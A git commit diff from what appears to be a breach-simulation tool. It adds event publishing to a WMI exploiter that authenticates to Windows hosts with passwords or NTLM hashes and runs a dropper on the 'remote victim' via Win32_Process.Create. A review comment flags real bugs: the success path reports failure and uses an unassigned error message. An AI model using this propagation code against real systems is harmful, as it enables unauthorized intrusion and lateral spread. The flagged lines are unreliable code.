Agent: Publish events from WMI
This commit is contained in:
parent
4709ae771b
commit
ed191bcf61
|
@ -2,6 +2,7 @@ import logging
|
|||
import ntpath
|
||||
import socket
|
||||
import traceback
|
||||
from time import time
|
||||
|
||||
from impacket.dcerpc.v5.rpcrt import DCERPCException
|
||||
|
||||
|
@ -44,6 +45,7 @@ class WmiExploiter(HostExploiter):
|
|||
|
||||
wmi_connection = WmiTools.WmiConnection()
|
||||
|
||||
timestamp = time()
|
||||
try:
|
||||
wmi_connection.connect(
|
||||
self.host,
|
||||
|
@ -55,26 +57,34 @@ class WmiExploiter(HostExploiter):
|
|||
)
|
||||
except AccessDeniedException:
|
||||
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
|
||||
logger.debug(f"Failed connecting to {self.host} using WMI")
|
||||
error_message = f"Failed connecting to {self.host} using WMI"
|
||||
logger.debug(error_message)
|
||||
self._publish_exploitation_event(timestamp, False, error_message=error_message)
|
||||
continue
|
||||
except DCERPCException:
|
||||
self.report_login_attempt(False, user, password, lm_hash, ntlm_hash)
|
||||
logger.debug(f"Failed connecting to {self.host} using WMI")
|
||||
self._publish_exploitation_event(timestamp, False, error_message=error_message)
|
||||
continue
|
||||
|
||||
except socket.error:
|
||||
logger.debug(f"Network error in WMI connection to {self.host}")
|
||||
error_message = f"Network error in WMI connection to {self.host}"
|
||||
logger.debug(error_message)
|
||||
self._publish_exploitation_event(timestamp, False, error_message=error_message)
|
||||
return self.exploit_result
|
||||
|
||||
except Exception as exc:
|
||||
logger.debug(
|
||||
error_message = (
|
||||
f"Unknown WMI connection error to {self.host}: "
|
||||
f"{exc} {traceback.format_exc()}"
|
||||
)
|
||||
logger.debug(error_message)
|
||||
self._publish_exploitation_event(timestamp, False, error_message=error_message)
|
||||
return self.exploit_result
|
||||
|
||||
self.report_login_attempt(True, user, password, lm_hash, ntlm_hash)
|
||||
self.exploit_result.exploitation_success = True
|
||||
self._publish_exploitation_event(timestamp, False, error_message=error_message)
|
||||
|
||||
downloaded_agent = self.agent_binary_repository.get_agent_binary(self.host.os["type"])
|
||||
|
||||
|
@ -113,33 +123,30 @@ class WmiExploiter(HostExploiter):
|
|||
} + build_monkey_commandline(self.servers, self.current_depth + 1)
|
||||
|
||||
# execute the remote monkey
|
||||
propagation_timestamp = time()
|
||||
result = WmiTools.get_object(wmi_connection, "Win32_Process").Create(
|
||||
cmdline, ntpath.split(remote_full_path)[0], None
|
||||
)
|
||||
|
||||
if (0 != result.ProcessId) and (not result.ReturnValue):
|
||||
logger.info(
|
||||
"Executed dropper '%s' on remote victim %r (pid=%d, cmdline=%r)",
|
||||
remote_full_path,
|
||||
self.host,
|
||||
result.ProcessId,
|
||||
cmdline,
|
||||
f"Executed dropper '{remote_full_path}' on remote victim {self.host} "
|
||||
f"(pid={result.ProcessId}, cmdline={cmdline})"
|
||||
)
|
||||
|
||||
self.add_vuln_port(port="unknown")
|
||||
self.exploit_result.propagation_success = True
|
||||
self._publish_propagation_event(propagation_timestamp, True)
|
||||
else:
|
||||
error_message = (
|
||||
"Error executing dropper '%s' on remote victim %r (pid=%d, exit_code=%d, "
|
||||
"cmdline=%r)",
|
||||
remote_full_path,
|
||||
self.host,
|
||||
result.ProcessId,
|
||||
result.ReturnValue,
|
||||
cmdline,
|
||||
f"Error executing dropper '{remote_full_path}' on remote victim {self.host} "
|
||||
f"(pid={result.ProcessId}, exit_code={result.ReturnValue}, cmdline={cmdline})"
|
||||
)
|
||||
logger.debug(error_message)
|
||||
self.exploit_result.error_message = error_message
|
||||
self._publish_propagation_event(
|
||||
propagation_timestamp, False, error_message=error_message
|
||||
)
|
||||
|
||||
result.RemRelease()
|
||||
wmi_connection.close()
|
||||
|
|
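Review bot: The success path publishes a failure: right after `self.exploit_result.exploitation_success = True` the call is `self._publish_exploitation_event(timestamp, False, error_message=error_message)`, which reports `False` and reads `error_message`, a name that is never assigned on that path (it is only bound in the except branches), so the first successful credential raises UnboundLocalError and later ones carry a stale message from an earlier failed attempt; it should be `self._publish_exploitation_event(timestamp, True)`, assuming the second positional argument is the success flag as the `_publish_propagation_event` calls in the last hunk use it. The `except DCERPCException:` branch has the same unbound/stale `error_message` problem because it still logs the f-string directly; mirror the AccessDeniedException branch with `error_message = f"Failed connecting to {self.host} using WMI"` followed by `logger.debug(error_message)` before the publish call. The enclosing method begins before the first hunk and ends after the last, so the loop that makes the stale-value case possible is only inferred from the `continue` statements.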